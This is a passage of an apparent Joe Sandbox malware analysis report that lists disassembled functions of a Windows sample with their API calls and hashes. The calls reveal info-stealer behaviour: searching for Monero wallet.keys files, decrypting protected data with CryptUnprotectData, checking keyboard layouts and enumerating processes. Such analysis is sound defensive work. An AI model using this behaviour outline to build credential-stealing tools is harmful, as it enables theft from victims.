                                • Associated: 00000000.00000002.1747821540.000000000144D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_dc0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Findlstrcpy$File$CloseFirstNextlstrcatlstrlen
                                • String ID: \*.*
                                • API String ID: 2325840235-1173974218
                                • Opcode ID: 6d6b21276010afdc706320ce5078c4fb7b15297a775e4fc10a259c4efdf12333
                                • Instruction ID: a48da552db07bd66b28a2caf685261e18fed149c6d56062e5146eb182f543379
                                • Opcode Fuzzy Hash: 6d6b21276010afdc706320ce5078c4fb7b15297a775e4fc10a259c4efdf12333
                                • Instruction Fuzzy Hash: 81F19B719501699ADB25FB64CC96EEE7338FF54300F8081DBA40A62191EF306B8ADF75
                                Function 00DCDA80 Relevance: 13.8, APIs: 9, Instructions: 255fileCOMMON
                                Download Yara Rule
                                APIs
                                  • Part of subcall function 00DDA740: lstrcpy.KERNEL32(00DE0E17,00000000), ref: 00DDA788
                                  • Part of subcall function 00DDA920: lstrcpy.KERNEL32(00000000,?), ref: 00DDA972
                                  • Part of subcall function 00DDA920: lstrcat.KERNEL32(00000000), ref: 00DDA982
                                  • Part of subcall function 00DDA9B0: lstrlen.KERNEL32(?,01629208,?,\Monero\wallet.keys,00DE0E17), ref: 00DDA9C5
                                  • Part of subcall function 00DDA9B0: lstrcpy.KERNEL32(00000000), ref: 00DDAA04
                                  • Part of subcall function 00DDA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00DDAA12
                                  • Part of subcall function 00DDA8A0: lstrcpy.KERNEL32(?,00DE0E17), ref: 00DDA905
                                • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,00DE14B0,00DE0C2A), ref: 00DCDAEB
                                • StrCmpCA.SHLWAPI(?,00DE14B4), ref: 00DCDB33
                                • StrCmpCA.SHLWAPI(?,00DE14B8), ref: 00DCDB49
                                • FindNextFileA.KERNEL32(000000FF,?), ref: 00DCDDCC
                                • FindClose.KERNEL32(000000FF), ref: 00DCDDDE
                                Memory Dump Source
                                • Source File: 00000000.00000002.1747144020.0000000000DC1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true
                                • Associated: 00000000.00000002.1747124751.0000000000DC0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747144020.0000000000E71000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747144020.0000000000E7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747144020.0000000000EA2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747144020.000000000100A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747340780.000000000101E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747340780.00000000011A1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747340780.000000000127B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747340780.000000000129F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747340780.00000000012A6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747340780.00000000012B5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747664665.00000000012B6000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747799643.000000000144C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747821540.000000000144D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_dc0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
                                • String ID:
                                • API String ID: 3334442632-0
                                • Opcode ID: 3299ce473db52c72403e6cda19aa441c766e37d125d3630bf3bff5fb2e2056cb
                                • Instruction ID: 103b0ff7391b69c045d0e170aaae2f2eae9395c59ec9992e3e70fb3cc5d2ba30
                                • Opcode Fuzzy Hash: 3299ce473db52c72403e6cda19aa441c766e37d125d3630bf3bff5fb2e2056cb
                                • Instruction Fuzzy Hash: 2A912472A00215ABCB14FB74DC56EED737DEF84300F40C569B94A97285EE349B098BB2
                                Function 00DD7B90 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 114memoryCOMMON
                                Download Yara Rule
                                APIs
                                  • Part of subcall function 00DDA740: lstrcpy.KERNEL32(00DE0E17,00000000), ref: 00DDA788
                                • GetKeyboardLayoutList.USER32(00000000,00000000,00DE05AF), ref: 00DD7BE1
                                • LocalAlloc.KERNEL32(00000040,?), ref: 00DD7BF9
                                • GetKeyboardLayoutList.USER32(?,00000000), ref: 00DD7C0D
                                • GetLocaleInfoA.KERNEL32(?,00000002,?,00000200), ref: 00DD7C62
                                • LocalFree.KERNEL32(00000000), ref: 00DD7D22
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1747144020.0000000000DC1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true
                                • Associated: 00000000.00000002.1747124751.0000000000DC0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747144020.0000000000E71000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747144020.0000000000E7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747144020.0000000000EA2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747144020.000000000100A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747340780.000000000101E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747340780.00000000011A1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747340780.000000000127B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747340780.000000000129F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747340780.00000000012A6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747340780.00000000012B5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747664665.00000000012B6000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747799643.000000000144C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747821540.000000000144D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_dc0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: KeyboardLayoutListLocal$AllocFreeInfoLocalelstrcpy
                                • String ID: /
                                • API String ID: 3090951853-4001269591
                                • Opcode ID: 887bc0afe828f9c8df670ad4183a4dd2e6f6385d4d722901a4c540ac1aaf773a
                                • Instruction ID: c0d73ffea63b2bb2fdf41a99d8de6b9852f659c16895e34949b53be11be53487
                                • Opcode Fuzzy Hash: 887bc0afe828f9c8df670ad4183a4dd2e6f6385d4d722901a4c540ac1aaf773a
                                • Instruction Fuzzy Hash: 02413D71950218ABDB24DB58DC99BEDB774FF44700F2081DAE50962281DB746F85CFB1
                                Function 0118B4A7 Relevance: 10.4, Strings: 7, Instructions: 1655COMMON
                                Download Yara Rule
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1747340780.000000000101E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true
                                • Associated: 00000000.00000002.1747124751.0000000000DC0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747144020.0000000000DC1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747144020.0000000000E71000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747144020.0000000000E7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747144020.0000000000EA2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747144020.000000000100A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747340780.00000000011A1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747340780.000000000127B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747340780.000000000129F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747340780.00000000012A6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747340780.00000000012B5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747664665.00000000012B6000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747799643.000000000144C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747821540.000000000144D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_dc0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID: !]}$'xq}$:I}$Puoo$RR}z$`Ao$X7
                                • API String ID: 0-1956152347
                                • Opcode ID: e89745c5747628f502dcaa0243f2bd021ecbb237858c745e8c243b1925ef6a47
                                • Instruction ID: a42bc9eaa69994df0cd89fead5eccb51636eda9ed09ff3bea56dbf8f1ede76fb
                                • Opcode Fuzzy Hash: e89745c5747628f502dcaa0243f2bd021ecbb237858c745e8c243b1925ef6a47
                                • Instruction Fuzzy Hash: 21B219F360C2149FE304AE2DDC8567AFBE9EF94220F16893DEAC4C7744E63558058796
                                Function 01187F85 Relevance: 10.3, Strings: 7, Instructions: 1584COMMON
                                Download Yara Rule
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1747340780.000000000101E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true
                                • Associated: 00000000.00000002.1747124751.0000000000DC0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747144020.0000000000DC1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747144020.0000000000E71000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747144020.0000000000E7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747144020.0000000000EA2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747144020.000000000100A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747340780.00000000011A1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747340780.000000000127B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747340780.000000000129F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747340780.00000000012A6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747340780.00000000012B5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747664665.00000000012B6000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747799643.000000000144C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747821540.000000000144D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_dc0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID: \Ys9$adwr$zBp7$M_f$ngg${ss${vu
                                • API String ID: 0-2088454677
                                • Opcode ID: 10f70fb715831c1f7bc3b5578c796d2200cb4502df52871a81a575ad9a08d6a6
                                • Instruction ID: f918ca8b13964b99df5088e234edc54803e1d1602b46fc599fb693d2444f2879
                                • Opcode Fuzzy Hash: 10f70fb715831c1f7bc3b5578c796d2200cb4502df52871a81a575ad9a08d6a6
                                • Instruction Fuzzy Hash: F2B2F4F3A082149FE7046E2DEC8567AFBE9EF94720F1A493DEAC4C3344E63558448697
                                Function 00DCE430 Relevance: 9.3, APIs: 4, Strings: 1, Instructions: 514fileCOMMON
                                Download Yara Rule
                                APIs
                                  • Part of subcall function 00DDA740: lstrcpy.KERNEL32(00DE0E17,00000000), ref: 00DDA788
                                  • Part of subcall function 00DDA920: lstrcpy.KERNEL32(00000000,?), ref: 00DDA972
                                  • Part of subcall function 00DDA920: lstrcat.KERNEL32(00000000), ref: 00DDA982
                                  • Part of subcall function 00DDA9B0: lstrlen.KERNEL32(?,01629208,?,\Monero\wallet.keys,00DE0E17), ref: 00DDA9C5
                                  • Part of subcall function 00DDA9B0: lstrcpy.KERNEL32(00000000), ref: 00DDAA04
                                  • Part of subcall function 00DDA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00DDAA12
                                  • Part of subcall function 00DDA8A0: lstrcpy.KERNEL32(?,00DE0E17), ref: 00DDA905
                                • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,\*.*,00DE0D73), ref: 00DCE4A2
                                • StrCmpCA.SHLWAPI(?,00DE14F8), ref: 00DCE4F2
                                • StrCmpCA.SHLWAPI(?,00DE14FC), ref: 00DCE508
                                • FindNextFileA.KERNEL32(000000FF,?), ref: 00DCEBDF
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1747144020.0000000000DC1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true
                                • Associated: 00000000.00000002.1747124751.0000000000DC0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747144020.0000000000E71000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747144020.0000000000E7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747144020.0000000000EA2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747144020.000000000100A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747340780.000000000101E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747340780.00000000011A1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747340780.000000000127B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747340780.000000000129F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747340780.00000000012A6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747340780.00000000012B5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747664665.00000000012B6000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747799643.000000000144C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747821540.000000000144D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_dc0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcpy$FileFindlstrcat$FirstNextlstrlen
                                • String ID: \*.*
                                • API String ID: 433455689-1173974218
                                • Opcode ID: 4b7dc40d67b6e4c9e6d071e87632e9442164f07f50364bf41019c933f9942fa0
                                • Instruction ID: 9a58d17f696be823b84bb5648857ad4e3b81ffb81a526b81966c1582b5e8a59f
                                • Opcode Fuzzy Hash: 4b7dc40d67b6e4c9e6d071e87632e9442164f07f50364bf41019c933f9942fa0
                                • Instruction Fuzzy Hash: 3D1232719101589ADB15FB64DCA6EED7338EF54300F8081AAB50A97291EF346F49CFB2
                                Function 011864B1 Relevance: 9.1, Strings: 6, Instructions: 1646COMMON
                                Download Yara Rule
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1747340780.000000000101E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true
                                • Associated: 00000000.00000002.1747124751.0000000000DC0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747144020.0000000000DC1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747144020.0000000000E71000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747144020.0000000000E7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747144020.0000000000EA2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747144020.000000000100A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747340780.00000000011A1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747340780.000000000127B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747340780.000000000129F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747340780.00000000012A6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747340780.00000000012B5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747664665.00000000012B6000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747799643.000000000144C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747821540.000000000144D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_dc0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID: *io$2(c~$:Nw$Q{$\v$Z7J
                                • API String ID: 0-820486870
                                • Opcode ID: 126d83dc222f2a3c965ed756d253f63def0332d1132ae05031fe20abcae43b89
                                • Instruction ID: d5ae188a9fb722620000cdef1e8310734e9427a2dfae35b1f4c5f56dd18bd07c
                                • Opcode Fuzzy Hash: 126d83dc222f2a3c965ed756d253f63def0332d1132ae05031fe20abcae43b89
                                • Instruction Fuzzy Hash: 57B2E6F3A082049FE304AE29EC8577ABBE9EFD4720F1A453DE6C487744EA3558058697
                                Function 0118320D Relevance: 7.6, Strings: 5, Instructions: 1368COMMON
                                Download Yara Rule
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1747340780.000000000101E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true
                                • Associated: 00000000.00000002.1747124751.0000000000DC0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747144020.0000000000DC1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747144020.0000000000E71000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747144020.0000000000E7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747144020.0000000000EA2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747144020.000000000100A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747340780.00000000011A1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747340780.000000000127B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747340780.000000000129F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747340780.00000000012A6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747340780.00000000012B5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747664665.00000000012B6000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747799643.000000000144C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747821540.000000000144D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_dc0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID: =6$E_O]$_O~>$fluo$w{O6
                                • API String ID: 0-684366947
                                • Opcode ID: 497aa3fa2949e97ce556d9194b7bb7befb46e19af873463b240b6ade4116759c
                                • Instruction ID: 468fd7e8734b0b0c101e1e12d9ec99320f67e2439a1ceeba7bbbcc763a9bbd45
                                • Opcode Fuzzy Hash: 497aa3fa2949e97ce556d9194b7bb7befb46e19af873463b240b6ade4116759c
                                • Instruction Fuzzy Hash: E792E8F360C6049FE304AE6DDC8567AB7E5EF94720F1A893DEAC4C7744EA3598018687
                                Function 00DCC820 Relevance: 7.6, APIs: 5, Instructions: 95stringencryptionCOMMON
                                Download Yara Rule
                                APIs
                                • lstrlen.KERNEL32(?,00000001,?,00000000,00000000,00000000), ref: 00DCC871
                                • CryptStringToBinaryA.CRYPT32(?,00000000), ref: 00DCC87C
                                • lstrcat.KERNEL32(?,00DE0B46), ref: 00DCC943
                                • lstrcat.KERNEL32(?,00DE0B47), ref: 00DCC957
                                • lstrcat.KERNEL32(?,00DE0B4E), ref: 00DCC978
                                Memory Dump Source
                                • Source File: 00000000.00000002.1747144020.0000000000DC1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true
                                • Associated: 00000000.00000002.1747124751.0000000000DC0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747144020.0000000000E71000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747144020.0000000000E7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747144020.0000000000EA2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747144020.000000000100A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747340780.000000000101E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747340780.00000000011A1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747340780.000000000127B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747340780.000000000129F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747340780.00000000012A6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747340780.00000000012B5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747664665.00000000012B6000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747799643.000000000144C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747821540.000000000144D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_dc0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcat$BinaryCryptStringlstrlen
                                • String ID:
                                • API String ID: 189259977-0
                                • Opcode ID: f852c5e24a0dbf73622bc3c5f2d1c32bbc27359d9e4231ca48f100e4b8219a73
                                • Instruction ID: f36523f7fb0f8732bfa144be66ee3816803abf16350899e5d1b0eb72c10f0ee3
                                • Opcode Fuzzy Hash: f852c5e24a0dbf73622bc3c5f2d1c32bbc27359d9e4231ca48f100e4b8219a73
                                • Instruction Fuzzy Hash: E7416075A1421ADFDB10DF90DC88BEEB7B8BB48304F1041A8E509A7280D7755B84CFA1
                                Function 00DC7240 Relevance: 7.5, APIs: 5, Instructions: 48memoryencryptionCOMMON
                                Download Yara Rule
                                APIs
                                • GetProcessHeap.KERNEL32(00000008,00000400), ref: 00DC724D
                                • RtlAllocateHeap.NTDLL(00000000), ref: 00DC7254
                                • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000001,?), ref: 00DC7281
                                • WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,?,00000400,00000000,00000000), ref: 00DC72A4
                                • LocalFree.KERNEL32(?), ref: 00DC72AE
                                Memory Dump Source
                                • Source File: 00000000.00000002.1747144020.0000000000DC1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true
                                • Associated: 00000000.00000002.1747124751.0000000000DC0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747144020.0000000000E71000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747144020.0000000000E7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747144020.0000000000EA2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747144020.000000000100A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747340780.000000000101E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747340780.00000000011A1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747340780.000000000127B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747340780.000000000129F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747340780.00000000012A6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747340780.00000000012B5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747664665.00000000012B6000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747799643.000000000144C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747821540.000000000144D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_dc0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Heap$AllocateByteCharCryptDataFreeLocalMultiProcessUnprotectWide
                                • String ID:
                                • API String ID: 2609814428-0
                                • Opcode ID: a7c4b1f3bfeb43d9149c72a783b3701d9c545caaaa0a0db945f0933c9db1c9a4
                                • Instruction ID: f3d7dcf1036a9ef450dc55e56858350c5ed0381d4e1ee807d9e57dd04de484c4
                                • Opcode Fuzzy Hash: a7c4b1f3bfeb43d9149c72a783b3701d9c545caaaa0a0db945f0933c9db1c9a4
                                • Instruction Fuzzy Hash: 8C010075B40308FBEB20DBD4CD45F9EB778AB44700F104158FB45AB2C4D6B5AA018B65
                                Function 00DD9600 Relevance: 7.5, APIs: 5, Instructions: 42processCOMMON
                                Download Yara Rule
                                APIs
                                • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 00DD961E
                                • Process32First.KERNEL32(00DE0ACA,00000128), ref: 00DD9632
                                • Process32Next.KERNEL32(00DE0ACA,00000128), ref: 00DD9647
                                • StrCmpCA.SHLWAPI(?,00000000), ref: 00DD965C
                                • CloseHandle.KERNEL32(00DE0ACA), ref: 00DD967A
                                Memory Dump Source
                                • Source File: 00000000.00000002.1747144020.0000000000DC1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true
                                • Associated: 00000000.00000002.1747124751.0000000000DC0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747144020.0000000000E71000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747144020.0000000000E7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747144020.0000000000EA2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747144020.000000000100A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747340780.000000000101E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747340780.00000000011A1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747340780.000000000127B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747340780.000000000129F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747340780.00000000012A6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747340780.00000000012B5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747664665.00000000012B6000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747799643.000000000144C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747821540.000000000144D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_dc0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32
                                • String ID:
                                • API String ID: 420147892-0
                                • Opcode ID: 4d86921ff20933b5ed03d372965d99a6106a89201bacd89d607760647b15c6d3
                                • Instruction ID: 2bdec534221fa45d01c06ff6ebbc659c2fa556d4508576c5b5d3984b57232e77
                                • Opcode Fuzzy Hash: 4d86921ff20933b5ed03d372965d99a6106a89201bacd89d607760647b15c6d3
                                • Instruction Fuzzy Hash: 8701E975A00208EBDB25DFA5C958BEDB7F8EB48700F144189A94A97240D736DB44CF61
                                Function 01190628 Relevance: 6.7, Strings: 4, Instructions: 1715COMMON
                                Download Yara Rule
                                Strings
                                Memory Dump Source
